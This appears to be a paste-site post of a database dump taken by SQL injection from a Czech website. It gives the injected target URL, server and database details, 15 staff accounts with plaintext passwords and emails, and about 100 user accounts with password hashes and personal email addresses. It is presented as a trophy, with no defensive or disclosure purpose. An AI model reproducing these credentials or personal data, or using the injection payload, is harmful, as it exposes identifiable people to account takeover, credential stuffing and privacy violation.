- ||| report db:
- Target: http://www.prdel.cz/index_vypis.php?id=-1 OR 17-7=10
- Host IP: 127.0.0.1 (Proxy IP)
- Web Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2
- Powered-by: PHP/5.3.8
- DB Server: MySQL
- Resp. Time(avg): 6465 ms
- Current User: prdel_cz@localhost
- Sql Version: 5.5.17
- Current DB: prdel_cz
- System User: prdel_cz@localhost
- Host Name: fubar.sigpipe.cz
- Installation dir: /usr/local
- DB User: 'prdel_cz'@'localhost'
- Data Bases: information_schema, prdel_cz, test
- Data Base: prdel_cz
- Table: prd_autent
- Total Rows: 15
- Column found: id
- Column found: jmeno
- Column found: heslo
- Column found: podpis
- Column found: mail
- Column found: funkce
- Column found: major
- Count(*) of prdel_cz.prd_autent is 15
- //--------------------------------------------------------------------------------
- id jmeno heslo podpis mail funkce major
- 1 costra kost22 Costra costrova@prdel.cz 2
- 2 sowanso route66 Sowanso sowansova@prdel.cz 2
- 3 bahamaz baha22 Bahamaz polibte.nam@prdel.cz redaktor 2
- 4 nikdo asxsfd22s polibte.nam@prdel.cz 0
- 5 blafunka blaf22 Blafunka redaktorka 1
- 6 neznamy nez22 0
- 7 krysar krysa22 Krysa redaktor redaktor 0
- 8 corvin cor22vin Corvin corvinova@prdel.cz 2
- 9 mucker muck22 Mucker 0
- 10 tiskar tisk22 tiska polibte.nam@prdel.cz 0
- 11 Blackfloyd bla22flo Blackfloyd blackfloyd@centrum.cz 0
- 12 Mic mi22c Mic 0
- 13 sob sob66 Sob jiri.sobotka@post.cz spoluredaktor 1
- 14 greenspace wwwqq Greenspace 0
- 15 redakce dsfreiou redakce polibte.nam@prdel.cz 0
- --------------------------------------------------------------------------------//
- -----------------------------------------------------------------------------------**
- Count(*) of prdel_cz.prd_reg is 3614
- Column found: id
- Column found: login
- Column found: heslo
- Column found: mail
- Column found: datum_reg
- Column found: zeme
- Column found: podpis
- Column found: opravneni
- Column found: popis
- Column found: posl_posta
- Column found: nova_posta
- Column found: edit
- Column found: od_datum
- Column found: do_datum
- Column found: id_vlozil
- -- Added only the first 100 items ;)
- id login heslo mail podpis popis
- 1 d7e77c835af3d2a803c1cf28d60575bc neregistrov
- 2 Costra 413a54249f7a332a50d2242b6f341c65 costrova@prdel.cz Costra
- 3 Sowanso 151de84cca69258b17375e2f44239191 sowansova@prdel.cz Sowanso redaktor press
- 4 mucker c430d630174a7562f316de1422d7aad0 mucker@acid.cz Mucker
- 7 zblnk a369371bfdee5bf8a86b7855a22dd4da kika_badinska@yahoo.com
- 8 Zuzanka c07fefbae558f73d32686dec591af0ac suzzn66@hotmail.com
- 9 Hajdalak cb9a573872ba723dca2c7200e94f5eae prdelac@atlas.cz
- 10 Achojda fad3d364b57482bc8554ffa0fc8b66d6 Petulka.broucek@email.cz
- 11 Blackfloyd fb166902e26da020adb9e98a06069b06 blackfloyd@centrum.cz Blackfloyd redaktor
- 12 mikasyko 53c04118df112c13a8c34b38343b9c10 mikasyko@quick.cz
- 13 Milhaus18 827ccb0eea8a706c4c34a16891f84e7b Mafiouzis@seznam.cz
- 14 BoB d38ee19a4815c4aeba48227913092a6e robert.m@seznam.cz Bob redaktor
- 15 kali 4e4f523705f88c7253fc492d5a45743a jacho@post.cz
- 16 Krysar 81dc9bdb52d04dc20036dbd8313ed055 Krysa retraktor s p??alou
- 17 Drag 4edb2dc80889b1aec708ec4730f22387 kenilej666rtep@seznam.cz
- 18 Mirage 6cdc2b547529980d7f5e3b049b5150c9 xmirage@seznam.cz
- 19 Jitulinka c004b41d7921885f30c6474346fd2093 jtomanova@atlas.cz
- 20 jeniffer 22cb90807a19a5e2044756b089fa43ff
- 21 juppe 4790dfcb68fb43663e5ea74812cfc303 juppe@post.cz
- 22 Polibte.mi 0bcd844c7341754504e7e7f7a6582612 royman@email.cz
- 23 DjEm 2ce1ec32abcc09b95e64b14a9 1f2 f0450c1 sexibj@seznam.cz
- 24 06b2af75179fb94be097af182a442a4a michalgavlik@atlas.cz
- 25 P.P. 6ad61cf51456e20a2b6d8db294314de8
- 26
- 27 Petrd petrdj@post.cz
- 28 lunochod f39e6bec5195ca34d8b1cd33573f32a3 bilk7a@gytu.cz
- 29 Test 098f6bcd4621d373cade4e832627b4f6
- 30 pusa a32afbe54e4fbab0c8c44c01f5b90792 lucie87@centrum.cz
- 31 Nick 92c3b916311a5517d9290576e3ea37ad nick.king@quick.cz
- 32 vakalva 00fb6e1a2b7112baa41a5d2a85a9b357 Ivaneckaa@atlas.cz
- 33 KiiX ea1d6af7146d36d87ec481c3bf83cb35 KiiX@centrum.cz
- 34 1stenly 519dbf3fae4a9af1c6b4b4a0fc381ef0
- 35 abdul b6575858aecddd94af4abc23a24bf5f2 abdul@easemail.com
- 36 Lilith 2aee1c40199c7754da766e61452612cc lilith.d@email.cz
- 37 K.C. e3928a3bc4be46516aa33a79bbdfdb08 k.c.goodspeed@seznam.cz
- 38 gulasmen 738a6457be8432bab553e21b4235dd97 gulasmen@centrum.cz
- 39 milan 4bff2b649206a5609914986c92d06e12 vo.lomnice@atlas.cz
- 45 Delvita 37b43a655dec0e3504142003fce04a07 Deathmetal.Deicide@seznam.cz
- 46 mutant pepa 6074c6aa3488f3c2dddff2a7ca821aab mutantpepa@seznam.cz
- 47 Guppy aa47f8215c6f30a0dcdb2a36a9f4168e daniel.bazant@worldonline.cz
- 48 Brom_O_berin cc1f891423db1ee24498e76f3b107bbe berin@seznam.cz Brom O`berin
- 49 Crysa 76d084c2c90b5a76e7f2ca9a1a2f3980
- 50 medulka 0ea711391df8d060f4f81141e192814e handa@can.com
- 51 Prd f5467257608e18e5347354fe9198309b Marcutio@seznam.cz
- 52 Krist b46b30c3eda21e2fd3337bd5c0c0d486 kristous@seznam.cz
- 53 Martin Philippi 034483eb25564607c159035ed87a0c21 philippim@seznam.cz
- 54 Aaliyah 6813ad2917a9674bdf5c8f8bb2a04deb wu@email.cz
- 55 Pavel ca3ec598002d2e7662e2ef4bdd58278b p.vosahlik@wo.cz
- 56 Fluke f5f2e5896162f870b47efde00fc12894 flukeho@email.cz
- 57 radek 25df35de87aa441b88f22a6c2a830a17 freeman.t@centrum.cz
- 58 blech 1cca5f8a2bc5f4cc5b0782325eea2ee1 blech@centrum.cz
- 59 Magoor b3e654e3acf57cfbe6eb7e4a682ac740 magoor@click.cz
- 60 Mrs love d9479746ea51a4177f8bc092c5db7b8d SvrcinovaM@seznam.cz
- 61 Lenunka a384b6463fc216a5f8ecb6670f86456a lenunka@centrum.cz
- 62 hnismatlavej 97edfa43843271c6a4146d888ba9696f barpos@post.cz
- 63 prdelnice 055705420655acce96cfe0ca22b38bcc narciska@freemejl.cz
- 64 perak 076e1f7429091d4688b28b0f4e3374d1
- 65 xzoombikx e10adc3949ba59abbe56e057f20f883e xzoombikx@freemejl.cz
- 66 sleeva f666a8be6b2e0c1f0f66c58060124316 euphorion@post.cz
- 67 Marcela e60c7e24808655f86ceed8cb7d3e536d MarcelaCh@seznam.cz
- 68 Marylin 4cbfe67340292113c37189ac59871696 a.vitkova@seznam.cz
- 69 Bossak 955db0b81ef1989b4a4dfeae8061a9a6 ilovelunetic@seznam.cz
- 70 Tom 9ad97add7f3d9f29cd262159d4540c96 tomaskonva@volny.cz
- 71 j 3e55517aea64f6d368ef836459f15182 tchlup@soubce.cz
- 72 Sexy.cat 5bbc1df343ed3672a1ffd93d2de417ae Sexy.cat@seznam.cz
- 73 bisekmartin 955db0b81ef1989b4a4dfeae8061a9a6 martin.bisek@worldonline.cz
- 74 PanKlobouk 8627652212182177254630a62f81d801 lord.edmond@centrum.cz
- 75 Shadya 318fbaf5acbf2b69a202de4c6df4cd2c Shadya@atlas.cz
- 76 Adam 7d3e28d14440d6c07f73b7557e3d9602 zead@post.cz
- 77 Sraida 153697b4d766ede6971ee05a9d42e86c -Dido-@quick.cz
- 78 Mistr 140548adadcd75f4918901e83de48ebd
- 79 Charlie bf779e0933a882808585d19455cd7937 k.kovar@email.cz
- 80 Giltanas 02b65838e9d004709a94c8b3b46f01b3 ronovskv@gjr.cz
- 81 Bolik ec733571061b115252c5e38269cce13f bolik@seznam.cz
- 82 milka 827ccb0eea8a706c4c34a16891f84e7b
- 83 roger 3aa26518a06fdd715a5c93af12d8cdc5
- 84 nicky2001 f39322759f5c3e0db8d32b41a3312904 nicky2001@seznam.cz
- 85 kocur cd62562929ed9d64a1fda3c911f9de9d
- 86 ZZsup c4459bc0bba5a7fd3a0ee521c2cbbc18 ZZsup@guick.cz
- 87 mecma a72e6e60313605028784645efb13ca5c mecma@seznam.cz
- 88 Dub 6d577dceec0057176f6a08dba512af40 doubek.jirka@quick.cz
- 89 kuglimug 59f9d76078b0422c34ce11f8bee61373
- 90 Hana 785bb1e5e77a14325fd31ebeae836fff H.Melkusova@seznam.cz
- 91 Olinka ecc5b00cf0f3653b868990f8e3c7243f olinka.stolfova@post.cz
- 92 Ivosek 0eacfc1178fe6ff4265ba27dc69656be IvoVelicka@seznam.cz
- 93 jitus ebd5057f5e0c63cd89fb41e30f3c0077
- 94 Cindy 76bd0d90a1b88cfec6068f88d6d04dff
- 95 88d52b35e5147c0115bcd5c5dd7f7e3f
- 96 maus007 fc5cdb17ceffded1e53d9be32e54ebb1 maus007@seznam.cz
- 97 dextra 587c5b83f70ff651700e3b75953fb9d7
- 98 martina 2f0714f5365318775c8f50d720a307dc
- 99 chozearmando 17e94cd7242c7f3b9022eacf5855fe91 chozearmando@xko.cz
- 100 satan 87df2cd1570fd297de238aeee667fe0a
- -----------------------------------------------------------------------------------**
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement